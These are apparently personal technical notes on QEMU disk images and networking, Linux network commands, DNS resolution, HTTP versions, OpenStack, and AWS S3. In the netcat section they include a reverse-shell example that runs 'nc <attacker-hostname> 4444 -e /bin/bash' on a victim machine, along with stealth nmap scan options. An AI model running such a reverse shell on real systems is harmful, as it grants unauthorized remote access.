
Qemu

CLI

To run Qemu in the terminal (without a graphical window) we can use -nographic or -display curses.
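
A minimal sketch booting an existing disk image entirely in the terminal (the image path and memory size are placeholders):

qemu-system-x86_64 -m 2G -drive file=disk.qcow2,format=qcow2 -nographic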

Resources

Qemu images

Qemu disk images

There are two types of images:

  • raw: faster, static, takes the whole allocated space; can be created with dd or fallocate.
  • qcow2: less performant, dynamic copy-on-write, and supports snapshotting. Does not play well with Btrfs (COW on COW).

  • Overlay storage images are a way to create images from other images.
  • Qemu images can be resized or converted to other formats with qemu-img.
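
A few qemu-img invocations covering the points above (file names and sizes are examples):

qemu-img create -f raw disk.img 20G          # raw image (can also be made with dd or fallocate)
qemu-img create -f qcow2 disk.qcow2 20G      # copy-on-write image
qemu-img resize disk.qcow2 +10G              # grow an existing image
qemu-img convert -f raw -O qcow2 disk.img disk.qcow2   # convert between formats
qemu-img info disk.qcow2                     # inspect format, virtual and actual size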

GuestFS tools


qemu-img reference

Qemu networking

VirtualBox VS Qemu Networking

The following are VB Networking modes and how we can implement them in Qemu:

  • Not Attached: in qemu this is done by specifying -nic none.
  • NAT: this is the default for VB, and it is the way Qemu user networking (SLIRP) is set up.
    • The hypervisor NATs the traffic from the guest to the outside world.
    • By default the host is accessible from the guest at the address 10.0.2.2.
    • The guest is not accessible from the host by default. Access can be achieved through Port forwarding.
    • -device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::2222:22
    • In Qemu's usermode networking, a userspace networking stack is loaded in the qemu process. It is a standalone implementation of IP, TCP, UDP, DHCP, TFTP ...
  • NAT Networks: This creates a network similar to a home router; the services in the network can reach each other and the internet, but they cannot be reached by outside hosts.
    • This is done using bridges and TAP interfaces.
    • We create a bridge with a static IP address and plug it into the VMs' NICs, then we NAT from it. Finally we run dnsmasq on it to act as a DHCP and DNS server (see the sketch after this list).
  • Bridged networking: This is the same as the previous but more flexible.
    • In Qemu the tap device is bridged to a physical network interface so the machines are accessible from the host network.
    • -device virtio-net,netdev=network0 -netdev tap,id=network0,ifname=tap0,script=no,downscript=no
  • Internal networking: Same as bridged, but the VMs are not accessible from the host and vice versa.
    • This is achieved in Qemu by dropping all the traffic to the bridge on the INPUT iptables chain.
    • iptables -I FORWARD -m physdev --physdev-is-bridged -j ACCEPT
    • We either need to assign static IPs or run a DHCP server in one of the VMs.
  • Host-only networking: A hybrid between Internal and Bridged networking, since the VMs can't be accessed by the machines in the host's network, but can be accessed by the host itself.
    • In Qemu the bridge is created and assigned an IP, and no traffic destined to it is dropped. But it is not connected to any physical interface.
  • Generic networking: VDE networks.
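
A rough sketch of the bridge + TAP + NAT setup described above (interface names, the subnet and the uplink eth0 are assumptions):

# Create a bridge with a static address and bring it up
ip link add br0 type bridge
ip addr add 192.168.100.1/24 dev br0
ip link set br0 up

# Create a TAP device for the VM and plug it into the bridge
ip tuntap add dev tap0 mode tap
ip link set tap0 master br0
ip link set tap0 up

# NAT the bridge subnet out through the host uplink
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A POSTROUTING -s 192.168.100.0/24 -o eth0 -j MASQUERADE

# dnsmasq provides DHCP and DNS on the bridge
dnsmasq --interface=br0 --bind-interfaces --dhcp-range=192.168.100.10,192.168.100.100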

More on Qemu networking in the Arch wiki. And more on VB Networking on their manual.

Qemu networking CLI options

  • Qemu provides two different entities to configure networking for a VM:
    1. The frontend: the NIC that the guest sees; it can either be a virtualized network card (e1000) or a paravirtualized device (virtio-net).
    2. The backend: the interface used by Qemu to exchange network packets with the outside world (other VMs, the host, the internet ...).
  • There are 3 options to create network entities -nic, -netdev and -net.
  • -net can either create a frontend or a backend.
    • All frontends and backends created using -net are connected to a hub (previously named vlan). This way all of them will receive each other's packets.
    • It can not use vhost acceleration.
    • Qemu -net is deprecated in favor of -device + -netdev or -nic for fast and less verbose network configurations.
  • -netdev can only create backends and needs to be coupled with -device.
    • It does not create a shared hub, and every NIC is connected to its own backend only, which means packets are not shared between interfaces.
    • We can still connect to a hub using -netdev hubport; however, a hub is no longer required for most use cases.
    • -device can only be used with pluggable NICs. Boards with on-board NICs can't be configured with -device.
  • -nic can create both frontends and backends at the same time.
    • It is easier to use than -netdev and can configure onboard NICs, and does not place a hub between interfaces.
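
The three styles side by side, as a sketch (the ids and NIC model are examples):

# Legacy -net (deprecated): frontend + backend joined through a hub
qemu-system-x86_64 -net nic,model=e1000 -net user

# -device + -netdev: explicit frontend/backend pair, no hub
qemu-system-x86_64 -device e1000,netdev=net0 -netdev user,id=net0

# -nic: shorthand that creates both at once
qemu-system-x86_64 -nic user,model=e1000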

More information here

More on Qemu networking

  • In unprivileged setups, qemu VMs running with usermode networking can access each other using sockets.

More on Qemu networking and socket mode

Networking

Linux Networking

Network interface Management

1. Wired Interfaces

There are two main commands: ip addr (Layer 3) and ip link (Layer 2). Both have a CRUD-style interface; check the help using ip <command> help. The ip commands replaced the ifconfig commands.

  • ip l CRUD:
ip link show
ip link show dev <interface-name>
ip link add [link <dev-name>] name <interface-name> type <link-type> # Add a virtual link
ip link del dev <interface-name>
  • ip a CRUD:
ip addr show
ip addr show dev <interface-name>
ip addr add dev <interface-name> <ip-address>/<mask>
ip addr del dev <interface-name> <ip-address>/<mask>

2. Wireless Interfaces

iw replaced iwconfig and iwlist. iw dev is used to manage wireless interfaces, scan for available networks, connect to a network (using its SSID), etc. iw phy manages the hardware device.

iw dev wlan0 link # information about the link 
iw dev wlan0 info # information about the interface
iw dev wlan0 scan
iw dev wlan0 connect <SSID>

3. ARP protocol

ip [-s] neigh is used to display the neighbors list, aka the ARP cache/table (-s gives verbose statistics). ip n offers create/delete/show/replace operations to manage the ARP cache:

ip n add <ip-addr> lladdr <mac-addr> dev <interface-name>
ip n del <ip-addr> dev <interface-name>
ip n show dev <interface-name>
ip n replace <ip-addr> lladdr <mac-addr> dev <interface-name> # Replace or add a MAC for the IP address

Notes

  • Difference between link, device and interface (Source): In the Linux context they all refer to the kernel's netdev, but in networking they can mean different things:
    • Link: the actual circuit, path, and/or cable between ports.
    • Device: either the entire system, or the blob within it that creates the electrical (optical) signal.
    • Interface: the logical middleground between the two, often in the context of the OS (eth0, f0/0, etc.)

TCP/IP

1. Routing

Iproute2 handles routing via the ip route command.

ip route add <network-ip-address>/mask via <router-ip-address> dev <interface-name>
ip route del <network-ip-address>/mask via <router-ip-address> dev <interface-name>
ip route add default via <default-gateway-ip>
ip route add prohibit <network-ip-address>/mask # blocks route and sends back an ICMP message
ip route add blackhole <network-ip-address>/mask # blocks route silently

2. TCP ports

Iproute2 replaces netstat with ss.

ss -lntp 
# -l: listening sockets, -n: numeric ports and addresses (no resolution), -t: TCP sockets, -p: show processes using the socket

lsof is very useful too! It shows open files per user and per process.

lsof -i4 # list all IPv4 network files
lsof -p <pid> # list by PID
lsof -u <username> # list by user (^ for negation)
lsof -i <protocol>:<port> # list by protocol and port
lsof <file-path> # processes that have a file open

3. TCPDump

tcpdump performs packet monitoring and capture on any network interface (even Bluetooth, loopback, ...).

tcpdump -D # list interfaces available for capture
tcpdump -i <interface-name> -c <count> -w <file-path> # capture packets on an interface and save the results to a file

TCPDump Cheatsheet

| Option | Description |
| --- | --- |
| -D | List interfaces available for capture |
| -i eth0 | Capture packets on an interface or all interfaces (any) |
| -c | Capture a specified count of packets |
| -n | Disable hostname resolution |
| -nn | Disable protocol, port, and hostname resolution |
| -i any protocol | Capture packets by protocol on all interfaces |
| -i any host 10.0.2.18 | Capture packets by a host on all interfaces |
| -i any src/dst 10.0.2.10 | Capture packets by source or destination address on all interfaces |
| -A | View packet content in ASCII |
| -X | View packet content in hex and ASCII |
| -w file_name.pcap | Save the output of tcpdump to a file |
| -r file_name.pcap | Read packets from a file |

4. Port Scanning with Nmap

Nmap is a port scanner. It supports many scanning modes.

nmap -iL <host-file> # scan all hosts in a file
nmap -sn <hostname> # Ping scan, host discovery
nmap -Pn <hostname> # Skips host discovery, Only scan the ports.
nmap -r <hostname> # Scan consecutively, don't randomize
nmap -F <hostname> # Perform a fast scan, only common ports
nmap -p <port1,...,portn> <hostname> # select ports to scan
nmap -sU/-sP <hostname> # scan UDP or TCP (default) ports only
nmap -sS <hostname> # TCP Syn scan (stealthy), quick and un-intrusive. start TCP handshake and never end it.
nmap -sT <hostname> # TCP connect Scan.

5. Interacting with remote hosts

ping sends ICMP packets to a destination IP. Very useful for troubleshooting and discovery.

Ping Cheatsheet

| Option | Description |
| --- | --- |
| hostname | Send a stream of ICMP packets to a hostname |
| 10.0.2.10 | Send a stream of ICMP packets to an IP address |
| -c 5 10.0.2.10 | Send a specified amount of packets |
| -s 100 10.0.2.10 | Alter the size of the packets |
| -i 3 10.0.2.10 | Change the interval for sending packets |
| -q 10.0.2.10 | Only show the summary information |
| -w 5 10.0.2.10 | Set a timeout of when to stop sending packets |
| -f 10.0.2.10 | Flood ping: send packets as soon as possible |
| -p ff 10.0.2.10 | Fill a packet with data (ff fills the packet with ones) |
| -b 10.0.2.10 | Send packets to a broadcast address |
| -t 10 10.0.2.10 | Limit the number of network hops (TTL) |
| -v 10.0.2.10 | Increase verbosity |

6. Netcat

Netcat is also very useful in this regard, since it writes and reads data across networks.

nc -l <port> # Listen on specific port
nc -u -l <port> # listen on an UDP port
nc -v -z <ip-address> <port> # Report connection status

# Reverse Shell
nc -lvp 4444 # On Attacker machine open a connection
nc <attacker-hostname> 4444 -e /bin/bash # On the victim machine

# File Transfer
nc -lvp 4444 > text.txt
nc <hostname> 4444 < test.txt

# Send GET Request to a webserver
printf "GET / HTTP/1.0\r\n\r\n" | nc <hostname> <port>

Network Configurations

1. RHEL Based systems (Old)

The config files used to live in /etc/sysconfig/network-scripts

| Option | Description |
| --- | --- |
| TYPE=Ethernet | The type of network interface device (e.g., Ethernet, Wi-Fi) |
| BOOTPROTO=none | Specify the boot protocol (none, dhcp, bootp) |
| DEFROUTE=yes | Specify the default route for IPv4 traffic (yes, no) |
| IPV6_DEFROUTE=yes | Specify the default route for IPv6 traffic (yes, no) |
| IPV4_FAILURE_FATAL=no | Disable the device if the IPv4 configuration fails (yes, no) |
| IPV6_FAILURE_FATAL=no | Disable the device if the IPv6 configuration fails (yes, no) |
| IPV6INIT=yes | Enable or disable IPv6 on the interface (yes, no) |
| IPV6_AUTOCONF=yes | Enable or disable autoconf configuration (yes, no) |
| NAME=eth0 | Specify a name for the connection |
| UUID=... | Specify the unique identifier for the device |
| ONBOOT=yes | Activate the interface on boot (yes, no) |
| HWADDR=00:00:00:00:00:00 | Specify the MAC address for the interface |
| IPADDR=10.0.1.10 | Specify the IPv4 address |
| PREFIX=24 | Specify the network prefix |
| NETMASK=255.255.255.0 | Specify the netmask |
| GATEWAY=10.0.1.1 | Specify the gateway |
| DNS1=192.168.123.3 | Specify a DNS server |
| DNS2=192.168.123.2 | Specify another DNS server |
| PEERDNS=yes | Modify the /etc/resolv.conf file (yes/no) |

2. Debian Based Systems (Old)

All network interface configurations go into /etc/network/interfaces, with additional snippets in /etc/network/interfaces.d/. Interfaces whose stanzas begin with auto are brought up on system startup.
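
A minimal static configuration sketch (the interface name and addresses are examples):

# /etc/network/interfaces
auto eth0
iface eth0 inet static
    address 10.0.2.15
    netmask 255.255.255.0
    gateway 10.0.2.1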

3. Distro agnostic config files

In addition to the distro related network configuration files, here are the most common remaining ones:

  • /etc/hosts: Name to IP Address associations
  • /etc/resolv.conf: DNS resolver configuration
  • /etc/sysconfig/network: Global network settings
  • /etc/nsswitch.conf: The Name Service Switch config file, used to determine Sources from which to obtain name-service information, and their order.
  • /etc/hostname: holds the machine hostname (can be set/shown using hostname or hostnamectl)
  • /etc/hosts.deny and /etc/hosts.allow: Allow or block access to certain services from remote clients (can use ALL to block or allow all). For example, to only allow hosts from the 10.0.3.* network to connect to our host via SSH, we can do the following:
# /etc/hosts.deny
sshd : ALL

# /etc/hosts.allow
sshd : 10.0.3.*

4. Network Manager

  • Network Manager vs ifcfg-* Options
| nmcli con mod | ifcfg-* file | Purpose |
| --- | --- | --- |
| ipv4.method manual | BOOTPROTO=none | Set a static IPv4 address |
| ipv4.method auto | BOOTPROTO=dhcp | Automatically set the IPv4 address using DHCP |
| ipv4.addresses "192.168.0.10/24" | IPADDR=192.168.0.10 PREFIX=24 | Set a static IPv4 address and prefix |
| ipv4.gateway 192.168.0.1 | GATEWAY=192.168.0.1 | Set the default gateway |
| ipv4.dns 8.8.8.8 | DNS1=8.8.8.8 | Specify a DNS server |
| autoconnect yes | ONBOOT=yes | Automatically activate this connection on boot |
| con-name eth0 | NAME=eth0 | Specify the name of the connection |
| ifname eth0 | DEVICE=eth0 | Specify the interface for the connection |
| 802-3-ethernet.mac-address ADDR | HWADDR=... | Specify the MAC address of the interface for the connection |
  • nmcli commands
| Command | Purpose |
| --- | --- |
| nmcli dev status | Show the status of all network interfaces |
| nmcli con show | List all connections |
| nmcli con show name | List the current settings for the connection name |
| nmcli con add con-name name ... | Add a new connection named name |
| nmcli con mod name ... | Modify a connection |
| nmcli con reload | Reload the network configuration files |
| nmcli con up name / nmcli con down name | Activate or deactivate a connection |
| nmcli dev dis dev | Deactivate and disconnect the current connection on the interface dev |
| nmcli con del name | Delete the connection and its configuration file |
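
A sketch combining the options above into a static connection (connection name, interface and addresses are examples):

nmcli con add type ethernet con-name eth0-static ifname eth0 \
    ipv4.method manual ipv4.addresses 192.168.0.10/24 \
    ipv4.gateway 192.168.0.1 ipv4.dns 8.8.8.8 autoconnect yes
nmcli con up eth0-static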

Network Diagnostics and Troubleshooting

1. Traffic analysis with Traceroute and MTR

Traceroute tracks the route taken by packets from source to destination. The traceroute command uses UDP packets by default, but can use ICMP ECHO (-I) or TCP SYN (-T) for probing. Tracepath is a modern alternative with less fancy options.

traceroute -n -q 2 -I www.google.com # Don't resolve hostname, use ICMP and send only 2 probes per host.

MTR, on the other hand, uses ICMP ECHO by default, but this can be changed using -T (TCP) or -u (UDP). Also, MTR is a TUI and records more statistics.

mtr -r -c 3 -f 4 www.google.com # Generate a report instead of the real-time interface (3 runs, start at the 4th hop).
mtr -run4 -c 3 www.google.com # Report unresolved IPv4 addresses only, use UDP for probes.
mtr -w -c 3 www.google.com # Generate a wide report instead (non-truncated IP addresses/hostnames)

2. Network logs

Debian Based systems use /var/log/syslog for logging system logs, while RHEL based use /var/log/messages.

Another source of logs is the systemd journal, which is stored in a binary format and can be consulted using the journalctl utility. In addition to all of that we have dmesg, which reads messages from the kernel ring buffer.

Notes

  • Traceroute and MTR are very useful to troubleshoot and diagnose any network traffic problems.
  • Changing between UDP, ICMP and TCP probes can be helpful to get around routers that filter probes.
  • The kernel ring buffer is a data structure in the Linux kernel that stores log messages generated by the kernel. It is a cyclic buffer that holds the most recent log messages and can be read through the /proc/kmsg file or by using the dmesg command. The kernel ring buffer provides a quick and efficient way for system administrators to diagnose and troubleshoot problems with the Linux system.

Resources

DNS

DNS Resolution process

  1. The DNS resolver looks in its DNS cache.
  2. The DNS resolver breaks iduoad.com into [., com., iduoad.com.].
  3. The DNS resolution starts at ., which is called the root domain. Its IP addresses are already known to the DNS resolver. => returns (address of the authoritative nameserver of .)
  4. The DNS resolver queries the root domain nameserver to find the DNS servers that can respond with details on com.. => returns (address of the authoritative nameserver of com.)
  5. The DNS resolver queries the com. authoritative nameserver to get the authoritative nameserver for iduoad.com.
  6. The DNS resolver queries the authoritative nameserver for iduoad.com and gets the latter's IP address.

A DNS request using dig utility:

# To visualize the entire process we run the following command
dig +trace iduoad.com

A DNS response looks like the following:

iduoad.com.		1799	IN	CNAME	iduoad.netlify.app.
# REQUEST    TTL(for cache)    IN    Query TYPE    Response

DNS and Layer 4 protocols

Multiplexing/Demultiplexing and UDP in linux

  • Multiplexing: When a client makes a DNS request, after filling the necessary application payload, it passes the payload to the kernel via sendto system call.
  • Demultiplexing: When the kernel on server side receives the packet, it checks the port number and queues the packet to the application buffer of the DNS server process which makes a recvfrom system call and reads the packet.
  • UDP is one of the simplest transport layer protocols and it does only multiplexing and demultiplexing. Another common transport layer protocol, TCP, does a bunch of other things like reliable communication, flow control and congestion control...

TCP/UDP throughput and Kernel buffer size

  • If the underlying network is slow and the UDP layer can't queue packets down to the network layer, the sendto syscall will block until the kernel frees up some of its buffer. Increasing the write memory buffer values using the sysctl variables net.core.wmem_max and net.core.wmem_default provides some cushion to the application from the slow network.
  • The same thing happens on the server side. If the receiver process is slow (slower than the kernel), the kernel has to drop packets that can't be queued because the buffer is full. Since UDP doesn't guarantee reliability, these dropped packets cause data loss unless tracked by the application layer. Increasing the sysctl variables net.core.rmem_default and net.core.rmem_max can provide some cushion to slow applications from fast senders.
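
A quick sketch of inspecting and bumping these buffers (the values are arbitrary examples, not recommendations):

sysctl net.core.wmem_default net.core.wmem_max net.core.rmem_default net.core.rmem_max
sudo sysctl -w net.core.wmem_max=8388608
sudo sysctl -w net.core.rmem_max=8388608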

DNS Resolution in Linux

  1. When we visit a website, the browser first checks whether the domain is already stored in its DNS cache.
  2. If the domain name does not exist in the browser's DNS cache, the browser calls the gethostbyname/getaddrinfo libc function.
  3. Linux looks in /etc/nsswitch.conf to know the order it will follow when trying to resolve the domain name to an IP address.
  4. Let's say the NSS file contains the following entry: hosts: files dns.
  5. The OS will look in the /etc/hosts file first for a match of the domain name.
  6. If none is found in the hosts file, it will use the nss-dns plugin to make a DNS request to the DNS resolvers listed in /etc/resolv.conf (in order from top to bottom).

The DNS resolvers are populated by DHCP or statically configured by an administrator.
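
This path can be exercised from the shell with getent, which resolves names following the nsswitch.conf order (the domain is an example):

getent hosts iduoad.com      # resolves via the NSS order (files, dns, ...)
cat /etc/resolv.conf         # resolvers used by the dns service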

nsswitch.conf file

The /etc/nsswitch.conf file is used to configure which services are to be used to determine information such as hostnames, password files, and group files.

An example of the /etc/nsswitch.conf

# Name Service Switch configuration file.
# See nsswitch.conf(5) for details.

passwd: files systemd
group: files [SUCCESS=merge] systemd
shadow: files systemd
gshadow: files systemd

publickey: files

hosts: mymachines resolve [!UNAVAIL=return] files myhostname dns
networks: files

protocols: files
services: files
ethers: files
rpc: files

netgroup: files

The syntax is the following:

database_name: (service_specifications...[STATUS=ACTION])
  • database_name: the database we will be looking in.
  • service_specification: where we'll be looking. Depends on the presence of shared libraries (e.g. files, db, ldap, winbind ...).
  • STATUS: a resulting status for service_specification; if it occurs, ACTION is taken.

In the previous example:

  • for passwd, group, shadow and gshadow the system will look in the files first, then fall back to systemd.
  • for group, if the lookup in the files succeeds, processing will continue to systemd and the member lists of the groups found in both sources will be merged.
  • for hosts it will use the mymachines plugin, then resolve. If resolve is available it will return (stop the lookup); otherwise it will continue to files, myhostname and finally dns.
  • for other services it will use files.

NSS Plugins

There are many NSS (Name Service Switch) plugins that are used to resolve names to ips. Here are some examples:

  • nss-mymachines: provides hostname resolution for the names of containers running locally that are registered with systemd-machined.service.
  • nss-myhostname: provides hostname resolution for the locally configured system hostname as returned by gethostname.
  • nss-resolve: resolves hostnames via the systemd-resolved local network name resolution service. It replaces the nss-dns plug-in module that traditionally resolves hostnames via DNS.

Linux DNS utilities: dig vs nslookup

  • dig uses the OS resolver libraries. nslookup uses its own internal ones.
  • Internet Systems Consortium (ISC) has been trying to get people to stop using nslookup.
  • nslookup was considered deprecated until BIND 9.9.0a3 release.
  • Source in StackOverflow thread #❔

DNS applications

HTTP

HTTP/1.0 vs HTTP/1.1 vs HTTP/2.0

  • HTTP/1.0 uses a new TCP connection for each request.
  • HTTP/1.1 can only have one inflight request in an open TCP connection but connections can be reused for multiple requests one after another.
  • HTTP/2.0 can have multiple inflight requests on the same TCP connection.
  # This will exit after this single request.
  telnet iduoad.com 80
  GET / HTTP/1.0
  HOST:iduoad.com
  USER-AGENT: curl

  # We can reuse the same connection for multiple requests.
  telnet iduoad.com 80
  GET / HTTP/1.1
  HOST:iduoad.com
  USER-AGENT: curl

  GET / HTTP/1.1
  HOST:iduoad.com
  USER-AGENT: curl

Cloud

Openstack

Installation

Kolla Ansible

Kolla ansible inventory consists of 5 groups:

  1. control
  2. compute
  3. network
  4. storage
  5. monitoring

source

Networking

Openstack requires at least 2 network interfaces, in Kolla they are created using:

  • network_interface: Not used on its own but most other services default to using it.

  • neutron_external_interface: Required by Neutron and used for flat networking and tagged vlans

  • Openstack networks are Layer 2.

A network is the central object of the Neutron v2.0 API data model and describes an isolated Layer 2 segment. In a traditional infrastructure, machines are connected to switch ports that are often grouped together into Virtual Local Area Networks (VLANs) identified by unique IDs. Machines in the same network or VLAN can communicate with one another but cannot communicate with other networks in other VLANs without the use of a router.

IP address in openstack

  • To create a public IP address in openstack (a floating IP) we use openstack floating ip create docs
  • To assign a new IP address to a machine we use openstack server add floating ip docs
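
A short sketch (the external network name, server name and address are examples):

openstack floating ip create public                     # allocate a floating IP from the "public" network
openstack server add floating ip test_vm 203.0.113.10   # attach it to the instance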

Create a Test VM

openstack server create --flavor 1 --image cirros  --network <network-id>  test_vm

Networking

Creation

The Neutron workflow (when booting a VM instance)

  1. The user creates a network.
  2. The user creates a subnet and associates it with the network.
  3. The user boots a virtual machine instance and specifies the network.
  4. Nova interfaces with Neutron to create a port on the network.
  5. Neutron assigns a MAC address and IP address to the newly created port using attributes defined by the subnet.
  6. Nova builds the instance's libvirt XML file, which contains local network bridge and MAC address information, and starts the instance.
  7. The instance sends a DHCP request during boot, at which point the DHCP server responds with the IP address corresponding to the MAC address of the instance.
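
Steps 1-3 as CLI commands, roughly (names, flavor and the subnet range are examples):

openstack network create net1
openstack subnet create --network net1 --subnet-range 192.168.1.0/24 subnet1
openstack server create --flavor 1 --image cirros --network net1 vm1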

Deletion

  1. The user destroys the virtual machine instance.
  2. Nova interfaces with Neutron to destroy the ports associated with the instances.
  3. Nova deletes local instance data.
  4. The allocated IP and MAC addresses are returned to the pool.

Console

There are three remote console access methods commonly used with OpenStack:

  • novnc: An in-browser VNC client implemented using HTML5 Canvas and WebSockets
  • spice: A complete in-browser client solution for interaction with virtualized instances
  • xvpvnc: A Java client offering console access to an instance

Resources

AWS

AWS S3

General Overview

  • Object storage service for scalable, durable data storage.
  • 99.999999999% (11 9's) durability; 99.99% availability for most classes.
  • Unlimited storage; pay for usage (storage, requests, data transfer).
  • Global via multi-Region access; integrates with AWS services (EC2, Lambda, etc.).
  • Data Model:
    • Bucket – top-level container (unique name, global namespace)
    • Object – file + metadata
    • Key – full path to object within a bucket
  • There is no concept of directory in General-purpose S3.
  • A single upload (PUT) is limited to 5GB; objects larger than 5GB must use "multipart" upload.
  • Objects can have key-value pairs of Metadata and can have key-value tags (useful for security/lifecycles)
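
A few aws CLI calls illustrating buckets, keys and large uploads (bucket and key names are examples; aws s3 cp switches to multipart automatically for large files):

aws s3 mb s3://my-example-bucket                                        # create a bucket
aws s3 cp ./big-file.iso s3://my-example-bucket/backups/big-file.iso    # key = backups/big-file.iso
aws s3api head-object --bucket my-example-bucket --key backups/big-file.iso   # object metadata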

Storage Classes

| Class | Use Case | Durability | Availability | Retrieval Time | Minimum Storage Duration | Retrieval Fee |
| --- | --- | --- | --- | --- | --- | --- |
| S3 Standard | Frequent access | 11 9s | 99.99% | Instant | None | No |
| S3 Intelligent-Tiering | Unknown access patterns | 11 9s | 99.9–99.99% | Instant | None | No |
| S3 Standard-IA | Infrequent access | 11 9s | 99.9% | Instant | 30 days | Yes * |
| S3 One Zone-IA | Non-critical infrequent data | 11 9s | 99.5% | Instant | 30 days | Yes |
| S3 Glacier Instant Retrieval | Rarely accessed, quick retrieval | 11 9s | 99.9% | ms | 90 days | Yes |
| S3 Glacier Flexible Retrieval | Archive w/ minutes–hours access | 11 9s | 99.99% | minutes–hours | 90 days | Yes |
| S3 Glacier Deep Archive | Long-term cold storage | 11 9s | 99.99% | hours (12h typical) | 180 days | Yes |

* : Retrieval is priced per GB.

Glacier Retrieval Options

| Tier | Flexible Retrieval | Deep Archive |
| --- | --- | --- |
| Expedited | 1-5 minutes | N/A |
| Standard | 3-5 hours | 12 hours |
| Bulk | 5-12 hours | 48 hours |

Versioning

Lifecycle rule actions

Transition rule actions

  • (R1) Transition current versions of objects between storage classes.
    • Storage class transitions (Target storage class).
    • Days after object creation.
  • (R2) Transition noncurrent versions of objects between storage classes.
    • Storage class transitions.
    • Days after objects become noncurrent.
    • Number of newer versions to retain.

Deletion/Expiration rule actions

  • (R3) Expire current versions of objects.
    • Days after object creation
  • (R4) Permanently delete noncurrent versions of objects.
    • Days after objects become noncurrent
    • Number of newer versions to retain - Optional
  • (R5) Delete expired object delete markers or incomplete multipart uploads.
    • Delete expired object delete markers
    • Delete incomplete multipart uploads

Object deletion in a versioned bucket.

  • Delete an object with Show versions off -> soft delete -> a delete marker is created and becomes the current version, shadowing all other versions.
  • Delete an object with Show versions on -> permanent delete of the chosen version -> if the current version is deleted, the latest noncurrent version becomes current.
  • No promotion is supported. If an old version is wanted, it should be copied over the latest version to create a new version with the content of the old one.
  • Lifecycle rule action (R3) creates a delete marker and promotes it to current version.
  • The Expiration rule (R3) only applies to actual object versions, not delete markers.
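
The two delete behaviours with the aws CLI, as a sketch (bucket, key and version id are placeholders):

# Soft delete: adds a delete marker on top of the version stack
aws s3api delete-object --bucket my-example-bucket --key report.pdf

# Permanent delete of one specific version
aws s3api delete-object --bucket my-example-bucket --key report.pdf --version-id <version-id>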

Replication

Cross-Region Replication (CRR) vs Same-Region Replication (SRR)

| Feature | Details |
| --- | --- |
| Prerequisites | Versioning enabled on both source and destination |
| Replication scope | All objects, prefix, or tags |
| What's replicated | New objects after enabling, metadata, ACLs, tags |
| Not replicated | Existing objects (need S3 Batch), lifecycle actions, objects in Glacier/Deep Archive |
| Delete behavior | Delete markers can be replicated (optional), version deletes not replicated |
| Replication Time Control (RTC) | 99.99% within 15 minutes (SLA) |
| Batch Replication | Replicate existing objects, failed replications |

Two-way replication

  • Enable bidirectional replication between buckets
  • Prevents replication loops automatically

Security

Encryption at Rest

| Type | Key Management | Notes |
| --- | --- | --- |
| SSE-S3 | AWS managed (AES-256) | No performance impact |
| SSE-KMS | AWS KMS keys | KMS API limits apply |
| SSE-C | Customer-provided keys | Customer manages keys |
| Client-side | Encrypt before upload | Customer responsibility |
  • Bucket default encryption: Applied to new objects without specified encryption
  • Enforce encryption: Use bucket policy to deny unencrypted uploads
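
Setting bucket default encryption from the CLI, as a sketch (the bucket name is an example):

aws s3api put-bucket-encryption --bucket my-example-bucket \
  --server-side-encryption-configuration '{"Rules":[{"ApplyServerSideEncryptionByDefault":{"SSEAlgorithm":"AES256"}}]}'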

Encryption in Transit

  • SSL/TLS (HTTPS) endpoints available
  • Enforce with bucket policy: aws:SecureTransport condition

Access Control

Priority order: Explicit DENY → Explicit ALLOW → Implicit DENY

| Method | Scope | Use Case |
| --- | --- | --- |
| IAM Policies | User/role level | Control who can access S3 |
| Bucket Policies | Bucket level | Cross-account, public access, IP restrictions |
| ACLs (legacy) | Bucket/object level | Simple permissions (avoid for new implementations) |
| Access Points | Subset of bucket | Simplify permissions for shared datasets |
| Presigned URLs | Object level | Temporary access without credentials |
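
Presigned URLs, for example, can be generated directly from the CLI (bucket, key and expiry are examples):

aws s3 presign s3://my-example-bucket/report.pdf --expires-in 3600   # URL valid for 1 hour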

Block Public Access (BPA)

  • Four settings: Block public ACLs, Ignore public ACLs, Block public policies, Restrict public buckets
  • Applied at account or bucket level
  • Overrides bucket policies and ACLs

S3 Access Points

  • Named network endpoints with dedicated policies
  • Each access point has own DNS name
  • Supports VPC-only access
  • Simplifies managing access for shared datasets
  • Can restrict to specific VPC/VPCE

Event Notifications

Destinations: SNS, SQS, Lambda, EventBridge

Events:

  • Object created (PUT, POST, COPY, CompleteMultipartUpload)
  • Object deleted, restored
  • Replication events
  • Lifecycle events
  • Intelligent-Tiering changes

EventBridge advantages:

  • Advanced filtering (JSON rules)
  • Multiple destinations
  • Archive, replay events
  • 18+ AWS service targets

S3 Directory Buckets

  • New bucket type optimized for high performance
  • Used with S3 Express One Zone storage class
  • Single-digit millisecond latency
  • Up to 100GB/s throughput per bucket
  • Consistent hashing for predictable performance
  • Different naming: bucket-name--azid--x-s3

Performance

Multipart Upload

  • Required for objects > 5GB
  • Recommended for objects > 100MB
  • Parts: 1-10,000 parts, 5MB-5GB each (except last)
  • Benefits: Parallel uploads, pause/resume, start before knowing final size

Transfer Acceleration

  • Uses CloudFront edge locations
  • URL: bucket-name.s3-accelerate.amazonaws.com
  • Up to 50-500% faster for global users
  • Additional cost per GB
  • Test speed: AWS provides comparison tool

Performance Baseline

  • 3,500 PUT/COPY/POST/DELETE requests per second per prefix
  • 5,500 GET/HEAD requests per second per prefix
  • No limit on prefixes per bucket
  • Spread objects across prefixes for higher throughput

Byte-Range Fetches

  • Request specific byte ranges of object
  • Parallelize downloads
  • Resilient to network failures (retry smaller range)
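
A byte-range fetch with the CLI, as a sketch (names and the range are examples):

aws s3api get-object --bucket my-example-bucket --key big-file.iso --range bytes=0-1048575 part-0.bin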

S3 Select & Glacier Select

  • Retrieve subset of data using SQL
  • Filter at S3 side (up to 400% faster, 80% cheaper)
  • Works with CSV, JSON, Parquet
  • Supports compression (GZIP, BZIP2)

AWS EC2

EC2 instance types

Instance types names are composed of 4 components

  1. Instance family: The primary purpose of the instance.
  2. Generation: Version number, higher is newer, faster and usually cheaper for the same performance
  3. Additional capabilities: Information about Additional hardware capabilities. Like CPU brand, networking optimization, ...
  4. Service related prefix/suffix: The service owning the instance (e.g. rds, search, cache...)
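
For example, the name c7gn.2xlarge breaks down roughly as follows (shown as comments):

# c        -> Compute Optimized family
# 7        -> 7th generation
# g        -> Graviton (ARM) processor
# n        -> Network optimized
# .2xlarge -> instance size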

Common Instance families

| Family | Letter | What It's Optimized For | Common Use Cases |
| --- | --- | --- | --- |
| General Purpose | T (Burstable) | Low baseline CPU with "burst" capability | Dev/test servers, blogs, small web apps |
